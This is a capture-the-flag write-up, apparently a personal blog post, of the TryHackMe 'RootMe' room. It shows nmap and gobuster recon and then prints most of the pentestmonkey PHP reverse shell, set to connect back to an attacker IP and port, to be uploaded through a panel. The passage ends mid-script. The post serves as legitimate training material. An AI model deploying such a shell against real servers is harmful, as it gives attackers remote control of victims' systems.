<!DOCTYPE html>
<html
  dir="ltr"
  lang="en"
  data-theme=""
  
    class="html theme--light"
  
><head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
  <title>
    
      
        Try Hack Me RootMe |
      Kalifornia909

  </title>

  
  <meta charset="utf-8" /><meta name="generator" content="Hugo 0.123.7"><meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover" />
  <meta name="author" content="Kalifornia909" />
  <meta
    name="description"
    content="TryHackMe - RootMe"
  />
  
  
    
    
    <link
      rel="stylesheet"
      href="/scss/main.min.1147aa5bacb4bce677a0e264073829caedb82fd18ea07a5f1d80521f539d1c45.css"
      integrity="sha256-EUeqW6y0vOZ3oOJkBzgpyu24L9GOoHpfHYBSH1OdHEU="
      crossorigin="anonymous"
      type="text/css"
    />
  

  
  <link
    rel="stylesheet"
    href="/css/markupHighlight.min.73ccfdf28df555e11009c13c20ced067af3cb021504cba43644c705930428b00.css"
    integrity="sha256-c8z98o31VeEQCcE8IM7QZ688sCFQTLpDZExwWTBCiwA="
    crossorigin="anonymous"
    type="text/css"
  />
  
  
  <link
    rel="stylesheet"
    href="/fontawesome/css/fontawesome.min.7d272de35b410fb165377550cdf9c4d3a80fbbcc961e111914e4d5c0eaf5729f.css"
    integrity="sha256-fSct41tBD7FlN3VQzfnE06gPu8yWHhEZFOTVwOr1cp8="
    crossorigin="anonymous"
    type="text/css"
  />
  
  <link
    rel="stylesheet"
    href="/fontawesome/css/solid.min.55d8333481b07a08e07cf6f37319753a2b47e99f4c395394c5747b48b495aa9b.css"
    integrity="sha256-VdgzNIGwegjgfPbzcxl1OitH6Z9MOVOUxXR7SLSVqps="
    crossorigin="anonymous"
    type="text/css"
  />
  
  <link
    rel="stylesheet"
    href="/fontawesome/css/regular.min.a7448d02590b43449364b6b5922ed9af5410abb4de4238412a830316dedb850b.css"
    integrity="sha256-p0SNAlkLQ0STZLa1ki7Zr1QQq7TeQjhBKoMDFt7bhQs="
    crossorigin="anonymous"
    type="text/css"
  />
  
  <link
    rel="stylesheet"
    href="/fontawesome/css/brands.min.9ed75a5d670c953fe4df935937674b4646f92674367e9e66eb995bb04e821647.css"
    integrity="sha256-ntdaXWcMlT/k35NZN2dLRkb5JnQ2fp5m65lbsE6CFkc="
    crossorigin="anonymous"
    type="text/css"
  />
  
  <link rel="shortcut icon" href="/favicons/favicon.ico" type="image/x-icon" />
  <link rel="apple-touch-icon" sizes="180x180" href="/favicons/apple-touch-icon.png" />
  <link rel="icon" type="image/png" sizes="32x32" href="/favicons/favicon-32x32.png" />
  <link rel="icon" type="image/png" sizes="16x16" href="/favicons/favicon-16x16.png" />

  <link rel="canonical" href="http://localhost:1313/post/try-hack-me-rootme/" />

  
  
  
  
  <script
    type="text/javascript"
    src="/js/anatole-header.min.f9132794301a01ff16550ed66763482bd848f62243d278f5e550229a158bfd32.js"
    integrity="sha256-&#43;RMnlDAaAf8WVQ7WZ2NIK9hI9iJD0nj15VAimhWL/TI="
    crossorigin="anonymous"
  ></script>

  
    
    
    <script
      type="text/javascript"
      src="/js/anatole-theme-switcher.min.d6d329d93844b162e8bed1e915619625ca91687952177552b9b3e211014a2957.js"
      integrity="sha256-1tMp2ThEsWLovtHpFWGWJcqRaHlSF3VSubPiEQFKKVc="
      crossorigin="anonymous"
    ></script>
  

  


  
  <meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:image" content="http://localhost:1313/images/site-feature-image.png" /><meta name="twitter:title" content="Try Hack Me RootMe"/>
<meta name="twitter:description" content="TryHackMe - RootMe"/>



  
  <meta property="og:title" content="Try Hack Me RootMe" />
<meta property="og:description" content="TryHackMe - RootMe" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://localhost:1313/post/try-hack-me-rootme/" /><meta property="og:image" content="http://localhost:1313/images/site-feature-image.png" /><meta property="article:section" content="post" />
<meta property="article:published_time" content="2021-08-01T11:06:58+09:00" />
<meta property="article:modified_time" content="2021-08-01T11:06:58+09:00" /><meta property="og:site_name" content="Kalifornia&#39;s Tech Wonderland" />




  
  
  
  
  <script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "articleSection": "post",
        "name": "Try Hack Me RootMe",
        "headline": "Try Hack Me RootMe",
        "alternativeHeadline": "",
        "description": "
      TryHackMe - RootMe


    ",
        "inLanguage": "en",
        "isFamilyFriendly": "true",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "http:\/\/localhost:1313\/post\/try-hack-me-rootme\/"
        },
        "author" : {
            "@type": "Person",
            "name": "Kalifornia909"
        },
        "creator" : {
            "@type": "Person",
            "name": "Kalifornia909"
        },
        "accountablePerson" : {
            "@type": "Person",
            "name": "Kalifornia909"
        },
        "copyrightHolder" : {
            "@type": "Person",
            "name": "Kalifornia909"
        },
        "copyrightYear" : "2021",
        "dateCreated": "2021-08-01T11:06:58.00Z",
        "datePublished": "2021-08-01T11:06:58.00Z",
        "dateModified": "2021-08-01T11:06:58.00Z",
        "publisher":{
            "@type":"Organization",
            "name": "Kalifornia909",
            "url": "http://localhost:1313/",
            "logo": {
                "@type": "ImageObject",
                "url": "http:\/\/localhost:1313\/favicons\/favicon-32x32.png",
                "width":"32",
                "height":"32"
            }
        },
        "image": 
      [
        
        "http://localhost:1313/images/site-feature-image.png"


      
      ]

    ,
        "url" : "http:\/\/localhost:1313\/post\/try-hack-me-rootme\/",
        "wordCount" : "1318",
        "genre" : [ 
      
      "Ethical Hacking"

    
      
        ,

      
      "CTF"

    
      
        ,

      
      "TryHackMe"

    
      
        ,

      
      "Linux"

    
      
        ,

      
      "Pentesting"

    ],
        "keywords" : [ 
      
      "THM"

    
      
        ,

      
      "CTF"

    
      
        ,

      
      "PHP"

    ]
    }
  </script>


</head>
<body class="body">
    <div class="wrapper">
      <aside
        
          class="wrapper__sidebar"
        
      ><div
  class="sidebar
    animated fadeInDown
  "
>
  <div class="sidebar__content">
    <div class="sidebar__introduction">
      <img
        class="sidebar__introduction-profileimage"
        src="/images/logo.jpg"
        alt="profile picture"
      />
      
        <div class="sidebar__introduction-title">
          <a href="/">Kalifornia&#39;s Tech Wonderland</a>
        </div>
      
      <div class="sidebar__introduction-description">
        <p></p>
      </div>
    </div>
    <ul class="sidebar__list">
      
        <li class="sidebar__list-item">
          <a
            href="https://www.linkedin.com/in/joshua-gaede/"
            target="_blank"
            rel="noopener me"
            aria-label="Linkedin"
            title="Linkedin"
          >
            <i class="fab fa-linkedin fa-2x" aria-hidden="true"></i>
          </a>
        </li>
      
        <li class="sidebar__list-item">
          <a
            href="https://github.com/zer0sense"
            target="_blank"
            rel="noopener me"
            aria-label=""
            title=""
          >
            <i class="fab fa-github fa-2x" aria-hidden="true"></i>
          </a>
        </li>
      
        <li class="sidebar__list-item">
          <a
            href="https://twitter.com/kalifornia909"
            target="_blank"
            rel="noopener me"
            aria-label=""
            title=""
          >
            <i class="fab fa-twitter fa-2x" aria-hidden="true"></i>
          </a>
        </li>
      
    </ul>
  </div><footer class="footer footer__sidebar">
  <ul class="footer__list">
    <li class="footer__item">
      &copy;
      
        2020-2025
      
    </li>
    
  </ul>
</footer>
  
  <script
    type="text/javascript"
    src="/js/medium-zoom.min.1248fa75275e5ef0cbef27e8c1e27dc507c445ae3a2c7d2ed0be0809555dac64.js"
    integrity="sha256-Ekj6dSdeXvDL7yfoweJ9xQfERa46LH0u0L4ICVVdrGQ="
    crossorigin="anonymous"
  ></script></div>
</aside>
      <main
        
          class="wrapper__main"
        
      >
        <header class="header"><div
  class="
    animated fadeInDown
  "
>
  <a role="button" class="navbar-burger" data-target="navMenu" aria-label="menu" aria-expanded="false">
    <span aria-hidden="true" class="navbar-burger__line"></span>
    <span aria-hidden="true" class="navbar-burger__line"></span>
    <span aria-hidden="true" class="navbar-burger__line"></span>
  </a>
  <nav class="nav">
    <ul class="nav__list" id="navMenu">
      
      
        
        
          <li class="nav__list-item">
            
            <a
              
              href="/"
              
              title=""
              >Home</a
            >
          </li>
        

      
        
        
          <li class="nav__list-item">
            
            <a
              
              href="/about/"
              
              title=""
              >About</a
            >
          </li>
        

      
        
        
          <li class="nav__list-item">
            
            <a
              
              href="/tags/"
              
              title=""
              >Tags</a
            >
          </li>
        

      
        
        
          <li class="nav__list-item">
            
            <a
              
              href="/categories"
              
              title=""
              >Categories</a
            >
          </li>
        

      
    </ul>
    <ul class="nav__list nav__list--end">
      
      
        <li class="nav__list-item">
          <div class="themeswitch">
            <a title="Switch Theme">
              <i class="fas fa-adjust fa-fw" aria-hidden="true"></i>
            </a>
          </div>
        </li>
      
    </ul>
  </nav>
</div>
</header>
  <div
    class="post 
      animated fadeInDown
    "
  >
    
    <div class="post__content">
      <h1>Try Hack Me RootMe</h1>
      
        <ul class="post__meta">
          <li class="post__meta-item">
            <em class="fas fa-calendar-day post__meta-icon"></em>
            <span class="post__meta-text"
              >
                
                  1/8/2021
                

              
            </span>
          </li>
          <li class="post__meta-item">
            <em class="fas fa-stopwatch post__meta-icon"></em>
            <span class="post__meta-text">7-minute read</span>
          </li>
        </ul>
      <p>I decided to dust off the kali virtual machine and do a <a href="https://tryhackme.com/room/rrootme">TryHackMe</a> room called RootMe. Don&rsquo;t mind if I do.</p>
<h2 id="scans">Scans</h2>
<p>Lets start off with a good trusty nmap scan <code>nmap -A -T4 -p- -v -oA nmap/rootme 10.10.100.229</code>.  Let&rsquo;s take a look at the results</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Nmap scan report for 10.10.100.229
</span></span><span class="line"><span class="cl">Host is up (0.27s latency).
</span></span><span class="line"><span class="cl">Not shown: 65533 closed ports
</span></span><span class="line"><span class="cl">PORT   STATE SERVICE VERSION
</span></span><span class="line"><span class="cl">22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
</span></span><span class="line"><span class="cl">| ssh-hostkey:
</span></span><span class="line"><span class="cl">|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
</span></span><span class="line"><span class="cl">|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
</span></span><span class="line"><span class="cl">|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
</span></span><span class="line"><span class="cl">80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
</span></span><span class="line"><span class="cl">| http-cookie-flags:
</span></span><span class="line"><span class="cl">|   /:
</span></span><span class="line"><span class="cl">|     PHPSESSID:
</span></span><span class="line"><span class="cl">|_      httponly flag not set
</span></span><span class="line"><span class="cl">| http-methods:
</span></span><span class="line"><span class="cl">|_  Supported Methods: GET HEAD POST OPTIONS
</span></span><span class="line"><span class="cl">|_http-server-header: Apache/2.4.29 (Ubuntu)
</span></span><span class="line"><span class="cl">|_http-title: HackIT - Home
</span></span><span class="line"><span class="cl">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">Read data files from: /usr/bin/../share/nmap
</span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/
</span></span></code></pre></div><p>I did catch that port 80 was open, so to the website!! Nothing&hellip;Nothing in the comments. Alright, well lets kick off a gobuster scan <code>gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,sh,txt,cgi,html,js,css,py -t 50 -u 10.10.100.229 | tee gobuster.txt</code></p>
<h2 id="exploitation">Exploitation</h2>
<p>There is an upload directory. This is promising. I did notice that there is PHP on this website, so I can possibly get a PHP reverse shell. During the gobuster scan it had a directory name panel with an upload function!! Thats how we get a reverse shell on the machine.</p>
<figure><img src="/images/Posts/011/panel.jpg"/>
</figure>

<p>Lets go ahead and get the PHP reverse shell generated.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">&lt;</span><span class="err">?</span><span class="n">php</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">php</span><span class="o">-</span><span class="n">reverse</span><span class="o">-</span><span class="n">shell</span> <span class="o">-</span> <span class="n">A</span> <span class="n">Reverse</span> <span class="n">Shell</span> <span class="n">implementation</span> <span class="ow">in</span> <span class="n">PHP</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Copyright</span> <span class="p">(</span><span class="n">C</span><span class="p">)</span> <span class="mi">2007</span> <span class="n">pentestmonkey</span><span class="err">@</span><span class="n">pentestmonkey</span><span class="o">.</span><span class="n">net</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">This</span> <span class="k">tool</span> <span class="n">may</span> <span class="n">be</span> <span class="n">used</span> <span class="k">for</span> <span class="n">legal</span> <span class="n">purposes</span> <span class="n">only</span><span class="o">.</span>  <span class="n">Users</span> <span class="n">take</span> <span class="n">full</span> <span class="n">responsibility</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="k">for</span> <span class="n">any</span> <span class="n">actions</span> <span class="n">performed</span> <span class="n">using</span> <span class="n">this</span> <span class="k">tool</span><span class="o">.</span>  <span class="n">The</span> <span class="n">author</span> <span class="n">accepts</span> <span class="n">no</span> <span class="n">liability</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="k">for</span> <span class="n">damage</span> <span class="n">caused</span> <span class="n">by</span> <span class="n">this</span> <span class="k">tool</span><span class="o">.</span>  <span class="n">If</span> <span class="n">these</span> <span class="n">terms</span> <span class="n">are</span> <span class="ow">not</span> <span class="n">acceptable</span> <span class="n">to</span> <span class="n">you</span><span class="p">,</span> <span class="n">then</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="k">do</span> <span class="ow">not</span> <span class="n">use</span> <span class="n">this</span> <span class="k">tool</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">In</span> <span class="n">all</span> <span class="n">other</span> <span class="n">respects</span> <span class="n">the</span> <span class="n">GPL</span> <span class="n">version</span> <span class="mi">2</span> <span class="n">applies</span><span class="p">:</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">This</span> <span class="n">program</span> <span class="n">is</span> <span class="n">free</span> <span class="n">software</span><span class="p">;</span> <span class="n">you</span> <span class="n">can</span> <span class="n">redistribute</span> <span class="n">it</span> <span class="ow">and</span><span class="o">/</span><span class="ow">or</span> <span class="n">modify</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">it</span> <span class="n">under</span> <span class="n">the</span> <span class="n">terms</span> <span class="n">of</span> <span class="n">the</span> <span class="n">GNU</span> <span class="n">General</span> <span class="n">Public</span> <span class="n">License</span> <span class="n">version</span> <span class="mi">2</span> <span class="n">as</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">published</span> <span class="n">by</span> <span class="n">the</span> <span class="n">Free</span> <span class="n">Software</span> <span class="n">Foundation</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">This</span> <span class="n">program</span> <span class="n">is</span> <span class="n">distributed</span> <span class="ow">in</span> <span class="n">the</span> <span class="n">hope</span> <span class="n">that</span> <span class="n">it</span> <span class="n">will</span> <span class="n">be</span> <span class="n">useful</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">but</span> <span class="n">WITHOUT</span> <span class="n">ANY</span> <span class="n">WARRANTY</span><span class="p">;</span> <span class="n">without</span> <span class="n">even</span> <span class="n">the</span> <span class="n">implied</span> <span class="n">warranty</span> <span class="n">of</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">MERCHANTABILITY</span> <span class="ow">or</span> <span class="n">FITNESS</span> <span class="n">FOR</span> <span class="n">A</span> <span class="n">PARTICULAR</span> <span class="n">PURPOSE</span><span class="o">.</span>  <span class="n">See</span> <span class="n">the</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">GNU</span> <span class="n">General</span> <span class="n">Public</span> <span class="n">License</span> <span class="k">for</span> <span class="n">more</span> <span class="n">details</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">You</span> <span class="n">should</span> <span class="n">have</span> <span class="n">received</span> <span class="n">a</span> <span class="n">copy</span> <span class="n">of</span> <span class="n">the</span> <span class="n">GNU</span> <span class="n">General</span> <span class="n">Public</span> <span class="n">License</span> <span class="n">along</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">with</span> <span class="n">this</span> <span class="n">program</span><span class="p">;</span> <span class="k">if</span> <span class="ow">not</span><span class="p">,</span> <span class="n">write</span> <span class="n">to</span> <span class="n">the</span> <span class="n">Free</span> <span class="n">Software</span> <span class="n">Foundation</span><span class="p">,</span> <span class="n">Inc</span><span class="o">.</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="mi">51</span> <span class="n">Franklin</span> <span class="n">Street</span><span class="p">,</span> <span class="n">Fifth</span> <span class="n">Floor</span><span class="p">,</span> <span class="n">Boston</span><span class="p">,</span> <span class="n">MA</span> <span class="mi">02110</span><span class="o">-</span><span class="mi">1301</span> <span class="n">USA</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">This</span> <span class="k">tool</span> <span class="n">may</span> <span class="n">be</span> <span class="n">used</span> <span class="k">for</span> <span class="n">legal</span> <span class="n">purposes</span> <span class="n">only</span><span class="o">.</span>  <span class="n">Users</span> <span class="n">take</span> <span class="n">full</span> <span class="n">responsibility</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="k">for</span> <span class="n">any</span> <span class="n">actions</span> <span class="n">performed</span> <span class="n">using</span> <span class="n">this</span> <span class="k">tool</span><span class="o">.</span>  <span class="n">If</span> <span class="n">these</span> <span class="n">terms</span> <span class="n">are</span> <span class="ow">not</span> <span class="n">acceptable</span> <span class="n">to</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">you</span><span class="p">,</span> <span class="n">then</span> <span class="k">do</span> <span class="ow">not</span> <span class="n">use</span> <span class="n">this</span> <span class="k">tool</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">You</span> <span class="n">are</span> <span class="n">encouraged</span> <span class="n">to</span> <span class="n">send</span> <span class="n">comments</span><span class="p">,</span> <span class="n">improvements</span> <span class="ow">or</span> <span class="n">suggestions</span> <span class="n">to</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">me</span> <span class="n">at</span> <span class="n">pentestmonkey</span><span class="err">@</span><span class="n">pentestmonkey</span><span class="o">.</span><span class="n">net</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Description</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="o">-----------</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">This</span> <span class="n">script</span> <span class="n">will</span> <span class="n">make</span> <span class="n">an</span> <span class="n">outbound</span> <span class="n">TCP</span> <span class="n">connection</span> <span class="n">to</span> <span class="n">a</span> <span class="n">hardcoded</span> <span class="ne">IP</span> <span class="ow">and</span> <span class="n">port</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">The</span> <span class="n">recipient</span> <span class="n">will</span> <span class="n">be</span> <span class="n">given</span> <span class="n">a</span> <span class="n">shell</span> <span class="n">running</span> <span class="n">as</span> <span class="n">the</span> <span class="n">current</span> <span class="n">user</span> <span class="p">(</span><span class="n">apache</span> <span class="n">normally</span><span class="p">)</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Limitations</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="o">-----------</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">proc_open</span> <span class="ow">and</span> <span class="n">stream_set_blocking</span> <span class="n">require</span> <span class="n">PHP</span> <span class="n">version</span> <span class="mf">4.3</span><span class="o">+</span><span class="p">,</span> <span class="ow">or</span> <span class="mi">5</span><span class="o">+</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Use</span> <span class="n">of</span> <span class="n">stream_select</span><span class="p">()</span> <span class="n">on</span> <span class="n">file</span> <span class="n">descriptors</span> <span class="n">returned</span> <span class="n">by</span> <span class="n">proc_open</span><span class="p">()</span> <span class="n">will</span> <span class="n">fail</span> <span class="ow">and</span> <span class="k">return</span> <span class="n">FALSE</span> <span class="n">under</span> <span class="n">Windows</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Some</span> <span class="n">compile</span><span class="o">-</span><span class="n">time</span> <span class="n">options</span> <span class="n">are</span> <span class="n">needed</span> <span class="k">for</span> <span class="n">daemonisation</span> <span class="p">(</span><span class="n">like</span> <span class="n">pcntl</span><span class="p">,</span> <span class="n">posix</span><span class="p">)</span><span class="o">.</span>  <span class="n">These</span> <span class="n">are</span> <span class="n">rarely</span> <span class="n">available</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Usage</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="o">-----</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">See</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">pentestmonkey</span><span class="o">.</span><span class="n">net</span><span class="o">/</span><span class="n">tools</span><span class="o">/</span><span class="n">php</span><span class="o">-</span><span class="n">reverse</span><span class="o">-</span><span class="n">shell</span> <span class="k">if</span> <span class="n">you</span> <span class="n">get</span> <span class="n">stuck</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">set_time_limit</span> <span class="p">(</span><span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">VERSION</span> <span class="o">=</span> <span class="s2">&#34;1.0&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">ip</span> <span class="o">=</span> <span class="s1">&#39;10.13.13.198&#39;</span><span class="p">;</span>  <span class="o">//</span> <span class="n">CHANGE</span> <span class="n">THIS</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">port</span> <span class="o">=</span> <span class="mi">9001</span><span class="p">;</span>       <span class="o">//</span> <span class="n">CHANGE</span> <span class="n">THIS</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">chunk_size</span> <span class="o">=</span> <span class="mi">1400</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">write_a</span> <span class="o">=</span> <span class="n">null</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">error_a</span> <span class="o">=</span> <span class="n">null</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">shell</span> <span class="o">=</span> <span class="s1">&#39;uname -a; w; id; /bin/sh -i&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">daemon</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">debug</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Daemonise</span> <span class="n">ourself</span> <span class="k">if</span> <span class="n">possible</span> <span class="n">to</span> <span class="n">avoid</span> <span class="n">zombies</span> <span class="n">later</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">pcntl_fork</span> <span class="n">is</span> <span class="n">hardly</span> <span class="n">ever</span> <span class="n">available</span><span class="p">,</span> <span class="n">but</span> <span class="n">will</span> <span class="n">allow</span> <span class="n">us</span> <span class="n">to</span> <span class="n">daemonise</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">our</span> <span class="n">php</span> <span class="n">process</span> <span class="ow">and</span> <span class="n">avoid</span> <span class="n">zombies</span><span class="o">.</span>  <span class="n">Worth</span> <span class="n">a</span> <span class="n">try</span><span class="o">...</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="n">function_exists</span><span class="p">(</span><span class="s1">&#39;pcntl_fork&#39;</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">Fork</span> <span class="ow">and</span> <span class="n">have</span> <span class="n">the</span> <span class="n">parent</span> <span class="n">process</span> <span class="n">exit</span>
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">pid</span> <span class="o">=</span> <span class="n">pcntl_fork</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">	
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">pid</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;ERROR: Can&#39;t fork&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">pid</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>  <span class="o">//</span> <span class="n">Parent</span> <span class="n">exits</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">Make</span> <span class="n">the</span> <span class="n">current</span> <span class="n">process</span> <span class="n">a</span> <span class="n">session</span> <span class="n">leader</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">Will</span> <span class="n">only</span> <span class="n">succeed</span> <span class="k">if</span> <span class="n">we</span> <span class="n">forked</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">posix_setsid</span><span class="p">()</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;Error: Can&#39;t setsid()&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">$</span><span class="n">daemon</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">printit</span><span class="p">(</span><span class="s2">&#34;WARNING: Failed to daemonise.  This is quite common and not fatal.&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Change</span> <span class="n">to</span> <span class="n">a</span> <span class="n">safe</span> <span class="n">directory</span>
</span></span><span class="line"><span class="cl"><span class="n">chdir</span><span class="p">(</span><span class="s2">&#34;/&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Remove</span> <span class="n">any</span> <span class="n">umask</span> <span class="n">we</span> <span class="n">inherited</span>
</span></span><span class="line"><span class="cl"><span class="n">umask</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Do</span> <span class="n">the</span> <span class="n">reverse</span> <span class="n">shell</span><span class="o">...</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Open</span> <span class="n">reverse</span> <span class="n">connection</span>
</span></span><span class="line"><span class="cl"><span class="o">$</span><span class="n">sock</span> <span class="o">=</span> <span class="n">fsockopen</span><span class="p">(</span><span class="o">$</span><span class="n">ip</span><span class="p">,</span> <span class="o">$</span><span class="n">port</span><span class="p">,</span> <span class="o">$</span><span class="n">errno</span><span class="p">,</span> <span class="o">$</span><span class="n">errstr</span><span class="p">,</span> <span class="mi">30</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="o">!$</span><span class="n">sock</span><span class="p">)</span> <span class="p">{</span>
